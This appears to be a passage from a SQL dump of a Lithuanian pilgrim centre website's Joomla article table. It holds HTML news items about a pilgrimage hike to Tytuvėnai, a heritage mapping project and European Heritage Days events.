left;\">Dalyvių skaičius ribotas</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Atvykimas savu transportu Maironio g. 2 B, Tytuvėnai, Kelmės r.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Registracija atvykus  Maironio g. 2 A, Tytuvėnai, Kelmės r.</span></p>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">ATMINTINĖ</span></strong></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Pasiimti ir su savimi turėti:</span></p>\r\n<ul>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">patogią avalynę;</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">kuprinę;</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">rožinį;</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">tarą vandeniui;</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">indą maistui, įrankius;</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">kepurę ar skarą nuo saulės, lietpaltį nuo lietaus;</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">dezinfekcinį skystį, kaukę.</span></li>\r\n</ul>\r\n<p style=\"text-align: justify;\"><strong><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">PĖSČIŲJŲ ŽYGIO METU JUMS UŽTIKRINSIME:</span></strong></p>\r\n<ul style=\"list-style-type: circle;\">\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Transportą įvairiems netikėtumams atsitikus.</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Medicinos personalą.</span></li>\r\n<li><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Žygio autentiškos stilistikos Apyrankę, piligriminį pasą.</span></li>\r\n</ul>',1,0,0,44,'2021-05-24 20:04:47',135,'','2021-05-24 20:17:32',135,0,'0000-00-00 00:00:00','2021-05-24 20:04:47','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/piligriminis_zygis\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,37,'','',1,2916,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(354,443,'Piligrimystės mėnuo baigėsi','piligrimystes-menuo-baigesi','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Piligrimystės mėnuo baigėsi, tačiau žygiuoti kviečiame <span>ištisus </span>metus.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">2020 metų rugsėjo mėn. Kelmės, Raseinių, Šiaulių rajono ir Šiaulių miesto merai pasirašė bendradarbiavimo sutartį, kurioje numatyta skleisti religinio turizmo ir piligrimystės šalyje idėjas, skatinti lankyti religinius bei kultūrinius objektus ir kurti piligrimystės įvaizdį. Bendradarbiavimo sutarties pagrindu patvirtintame priemonių plane siekdami skatinti ir populiarinti piligrimystę, Šv. Jokūbo kelius jungiančius visus keturis rajonus, birželis buvo paskelbtas piligrimystės mėnesiu. Šį mėnesį įvyko  keturi organizuoti piligriminiai žygiai.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">VšĮ ,,Tytuvėnų piligrimų centras‘‘ ir Tytuvėnų Švč. Mergelės Marijos Angelų karalienės parapija kvietė į vieną iš keturių piligriminių žygių dedikuotą Šv. Antano garbei Palendriai – Tytuvėnai. Žygyje dalyvavo svečiai iš Jurbarko, Druskininkų, Tauragės, Šiaulių ir Kelmės rajono.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Žygeiviai iš Tytuvėnų autobusu nuvežti į Palendrių Šv. Benedikto vienuolyną. Kelionės metu žygio vadovas kun. klebonas Evaldas Alūza visiems priminė, kas yra piligrimystė, siūlė kiekvienam susikurti intenciją ir nepamiršti viso žygio metu. Dalyviai plačiau sužinojo apie Šv. Antaną – žygio globėją, kuris suteikia apsaugas nuo ligų, sugrąžina prarastus daiktus.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Palendrių bažnyčioje visus pasitiko, palaiminimą suteikė Palendrių vienuolyno prioras tėvas Kazimieras.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Žygeivius apie ėjimo naudą žmogaus sveikatai ir galimus pavojus  žygio metu instruktavo Kelmės rajono savivaldybės visuomenės sveikatos biuro darbuotojos. Surengta viktorina, laimėjusiems įteiktos gertuvės ir kiti apdovanojimai.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Piligriminis žygis Palendriai – Tytuvėnai pareikalavo ištvermės įveikant iššūkius kelionėje, kurio metu buvo visko: saulės, lietaus, sraunios Kražantės upės, tačiau visi laimingi ir pilni entuziazmo grįžo įveikę 34 km atstumą. </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Piligriminiai žygiai baigėsi, tačiau pasirinktais maršrutais galima keliauti ištisus metus.</span></p>\r\n<p><iframe title=\"YouTube video player\" src=\"https://www.youtube.com/embed/rttq_UsYWE8\" frameborder=\"0\" width=\"1160\" height=\"700\"></iframe></p>',1,0,0,44,'2021-07-01 18:34:12',135,'','2021-07-01 18:40:25',135,0,'0000-00-00 00:00:00','2021-07-01 18:34:12','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/zygio_pabaiga\\/zygis.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,35,'','',1,1315,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(356,445,'Bažnyčių naktys','baznyciu-naktys','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Kelmės, Raseinių, Šiaulių raj. ir Šiaulių mieste</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Skiriama Šv. Jokūbo metams</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/bznyciu_naktys/baznyciu_naktys.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2021-07-08 21:15:45',135,'','2021-07-08 21:17:11',135,0,'0000-00-00 00:00:00','2021-07-08 21:15:45','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/bznyciu_naktys\\/baznyciu_naktys_main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,33,'','',1,2342,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(359,448,'Tytuvėnų kultūros paveldas ir jo pėdsakai','tytuvenu-kulturos-paveldas-ir-jo-pedsakai-istorijoje','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ \"Tytuvėnų piligrimų centras\" įgyvendino projektą ,,Tytuvėnų kultūros paveldas ir jo pėdsakai istorijoje‘‘.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto metu internetinėje platformoje sukurtas interaktyvus Tytuvėnų miestelio žemėlapis su integracija į 360 laipsnių nuotraukas papildytas įtraukiančiais aprašymais apie Tytuvėnų mieste esančius kultūros paveldo objektus ir istorines asmenybes lietuvių ir anglų kalbomis. Šiuo projektu didinamas kultūros paveldo, vietos ir rajono žinomumas, pristatomos visuomenei nekilnojamo paveldo vietos, kurios paprastai  sunkiai prieinamos.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projektas skirtas jaunajai kartai, meno atstovams, asmenims gyvenantiems Lietuvoje ir už jos ribų, ypač asmenims su negalia ar kitą socialinę atskirtį patiriantiems žmonėms, kurie neturi galimybės apsilankyti Tytuvėnų nekilnojamo kultūros  paveldo objektuose.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto įgyvendinimo laikotarpis yra nuo 2021 m. gegužės 14 d. iki 2021 m. rugsėjo 10 d. Projektas finansuojamas kultūros rėmimo fondo lėšomis TKR Šiaulių aps. prioritetas: istorinės atminties puoselėjimas 2021-2.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto rėmėjas: Lietuvos kultūros taryba</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto partneris: Tytuvėnų seniūnija</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Žemėlapio adresas  <a href=\"https://www.gidas360.lt/hmd/tytuvenai/custom/\" target=\"_blank\">https://www.gidas360.lt/hmd/tytuvenai/custom/ </a></span></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,57,'2021-09-11 18:51:34',135,'','2021-09-11 19:01:29',135,0,'0000-00-00 00:00:00','2021-09-11 18:51:34','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/lkt\\/lkt.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,1,'','',1,2932,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(360,449,'Tytuvėnų kultūros paveldas ir jo pėdsakai','tytuvenu-kulturos-paveldas-ir-jo-pedsakai-istorijoje','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">VšĮ \"Tytuvėnų piligrimų centras\" įgyvendino projektą ,,Tytuvėnų kultūros paveldas ir jo pėdsakai istorijoje‘‘.<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto metu internetinėje platformoje sukurtas interaktyvus Tytuvėnų miestelio žemėlapis su integracija į 360 laipsnių nuotraukas papildytas įtraukiančiais aprašymais apie Tytuvėnų mieste esančius kultūros paveldo objektus ir istorines asmenybes lietuvių ir anglų kalbomis. Šiuo projektu didinamas kultūros paveldo, vietos ir rajono žinomumas, pristatomos visuomenei nekilnojamo paveldo vietos, kurios paprastai  sunkiai prieinamos.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projektas skirtas jaunajai kartai, meno atstovams, asmenims gyvenantiems Lietuvoje ir už jos ribų, ypač asmenims su negalia ar kitą socialinę atskirtį patiriantiems žmonėms, kurie neturi galimybės apsilankyti Tytuvėnų nekilnojamo kultūros  paveldo objektuose.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto įgyvendinimo laikotarpis yra nuo 2021 m. gegužės 14 d. iki 2021 m. rugsėjo 10 d. Projektas finansuojamas kultūros rėmimo fondo lėšomis TKR Šiaulių aps. prioritetas: istorinės atminties puoselėjimas 2021-2.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto rėmėjas: Lietuvos kultūros taryba</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Projekto partneris: Tytuvėnų seniūnija</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"> </span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Žemėlapio adresas  <a href=\"https://www.gidas360.lt/hmd/tytuvenai/custom/\" target=\"_blank\">https://www.gidas360.lt/hmd/tytuvenai/custom/ </a></span></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2021-09-11 18:51:34',135,'','2021-09-11 19:01:29',0,0,'0000-00-00 00:00:00','2021-09-11 18:51:34','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/lkt\\/lkt.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,30,'','',1,1457,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(361,450,'Europos paveldo diena','europos-paveldo-diena','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">Edukacinė programa \"Senieji praeities lobynai\"<br /></span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Laikas: 2021 m rugsėjo 24 d. 16 val.<br /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Vieta: Tytuvėnų bažnyčios ir vienuolyno ansamblis.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Edukacinės programos metu \"Senieji praeities lobynai\" susipažinsite su valstybės saugoma istorine vertybe išlikusia iki mūsų dienų - Tytuvėnų Švč. Mergelės Marijos Angelų Karalienės bažnyčios vargonais bei kitais Tytuvėnų vienuolyno lobynais.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Programos metu turėsite galimybę išgirsti istorinės vertybės garsus su nuostabia vargonininke Dovile Savickaite (<a href=\"http://www.vargonai.lt/savickaite.htm\" target=\"_blank\">http://www.vargonai.lt/savickaite.htm</a>).</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Renginys NEMOKAMAS.</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">Išsami informacija ir registracija tel. nr.:</span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\">8 675 58506, el. paštu <a href=\"mailto:info@infotytuvenai.lt\">info@infotytuvenai.lt</a></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/europos_paveldo_diena/pic.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p style=\"text-align: justify;\"> </p>',1,0,0,44,'2021-09-20 19:47:53',135,'','2021-09-20 19:51:48',135,0,'0000-00-00 00:00:00','2021-09-20 19:47:53','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/europos_paveldo_diena\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,0,29,'','',1,1358,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(362,451,'Europos paveldo dienos','europos-paveldo-dienos','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\">2021 m. rugsėjo 17-26 d.<br /> 2021 m. Europos paveldo dienos Kelmės r.</span></p>\r\n','\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/epd2021/1.jpg\" border=\"0\" alt=\"\" /></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial, \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; text-align: left;\"><img src=\"images/stories/naujienos/epd2021/2.jpg\" border=\"0\" alt=\"\" /></span></p>',1,0,0,44,'2021-09-20 20:00:10',135,'','2021-09-20 20:01:21',135,0,'0000-00-00 00:00:00','2021-09-20 20:00:10','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/epd2021\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,28,'','',1,1352,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(363,452,'Naktinės ekskursijos','naktines-ekskursijos','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; 